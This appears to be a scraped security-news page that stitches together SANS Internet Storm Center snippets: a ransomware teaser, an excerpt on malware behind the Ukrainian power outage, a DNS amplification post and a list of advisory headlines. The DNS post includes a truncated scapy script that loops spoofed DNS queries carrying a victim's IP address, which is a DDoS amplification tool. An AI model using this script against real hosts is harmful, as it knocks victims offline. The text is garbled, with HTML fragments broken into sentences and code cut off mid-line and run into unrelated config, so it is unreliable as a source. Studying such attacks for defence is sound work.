Hackin9
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

We have all seen how ransomware is becoming a pretty common trend in cybercrimes. Well, there is a new variant and this one has been build using javascript. This malware fakes the NW.js framework. Once installed, connects to its C">Manuel Humberto Santander Pel">

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

(credit: Krzysztof Lasoń)

Highly destructive malware that infected at least three regional power authorities in Ukraine led to a power failure that left hundreds of thousands of homes without electricity last week, researchers said.

The outage left about half of the homes in the Ivano-Frankivsk region of Ukraine without electricity, Ukrainian news service TSN reported in an article posted a day after the December 23 failure. The report went on to say that the outage was the result of malware that disconnected electrical substations. On Monday, researchers from security firm iSIGHT Partners said they had obtained samples of the malicious code that infected at least three regional operators. They said the malware led to "destructive events" that in turn caused the blackout. If confirmed it would be the first known instance of someone using malware to generate a power outage.

"It's a milestone because we've definitely seen targeted destructive events against energy before—oil firms, for instance—but never the event which causes the blackout," John Hultquist, head of iSIGHT's cyber espionage intelligence practice, told Ars. "It's the major scenario we've all been concerned about for so long."

Read 7 remaining paragraphs | Comments

 

Yes, it has been said too many times, but still there are too many DNS servers out there allowing recursion to devices outside their network, which could be used for DNS amplification attacks. How? The attacker sends a spoofed DNS request with the victim IP address, usually from a botnet. When the misconfigured DNS answers will send the packet to the victim IP address causing a DDoS attack.

How can you test if your DNS allow recursion from the outside? You can use the dns-recursion nmap script:

If it">#!/usr/bin/python
from scapy.all import *
victimIP = raw_input(Please enter the IP address for the victim: )
dnsIP = raw_input(Please enter the IP address for the misconfigured DNS: )
while True:
send(IP(dst=dnsIP,src=victimIP)/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname=www.google.com
options {

Manuel Humberto Santander Pelez
SANS Internet Storm Center - Handler
Twitter: @manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
CVE-2015-7944, CVE-2015-7945 - Ganeti Security Advisory (DoS, Unauthenticated Info Leak)
 
Confluence Vulnerabilities
 

Naked Security

Monday review – the hot 10 stories of the week
Naked Security
Why not sign up for our daily newsletter to make sure you don't miss anything. You can easily unsubscribe if you decide you no longer want it. Follow @NakedSecurity. Image of days of week courtesy of Shutterstock. computer security · Infosec · news ...

 
Executable installers/self-extractors are vulnerable^WEVIL (case 17): Kaspersky Labs utilities
 
[SECURITY] CVE-2015-5349: Apache Directory Studio command injection vulnerability
 
Open Audit SQL Injection Vulnerability
 
[SECURITY] [DSA 3433-1] samba security update
 
Internet Storm Center Infocon Status